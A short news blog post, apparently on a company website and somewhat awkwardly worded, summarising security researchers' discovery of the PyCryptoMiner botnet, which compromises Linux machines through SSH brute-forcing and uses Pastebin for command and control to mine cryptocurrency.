Certified company | Engineering the world

Get in touch

Even Linux Is Not Safe From Cryptomining Botnets

Jan 6, 2018 | Uncategorized | 0 comments

Not even a week passes without discovering a new crypto miner that pirates foreign computing power to produce bitcoin and co.The security researchers of F5 have now exposed a new botnet that takes over Linux machines with a trick.

Linux Cryptomining

The botnet named F5 PyCryptoMiner takes over the Linux systems via brute force attacks via the SSH protocol. If a password is guessed about this, the botnet uses the Python interpreter to execute a plain-looking and cryptically named script, which loads another Python script from a command-and-control server. This then sets up a cron job, run every six hours, which then selectively reconciles and handles other activities such as cryptocurrency mining.
Also Read:Abducted Bitcoin Exchange Exmo Chief Freed After Crypto Ransom Payment

The security experts found evidence that this way alone since December may have produced 158 units of the cryptocurrency with a market value of currently $ 60,000. The attackers obviously use the remote-controlled computers for other purposes. It is particularly important to PyCryptoMiner that the botnet uses a clipboard on the publishing host pastebin.com as a clipboard and does not communicate directly with a specific IP address of a control server. As a result, the network cannot be leveraged by blocking such a server address. One would have to lock the access to Pastebin.

Also Read: Tips To Keep Crypto Wallet Safe For Beginners

The corresponding Pastebin reference was called since August 2017 daily about a thousand times. The owner of the registered domain has registered a total of 36,000 additional domains, as well as 235 different e-mail addresses. These would be used among other things for gambling portals and porn sites.


let’s get connected

Have a Question?

If you have any questions or need to discuss about your project
Feel free to reach out to our friendly team.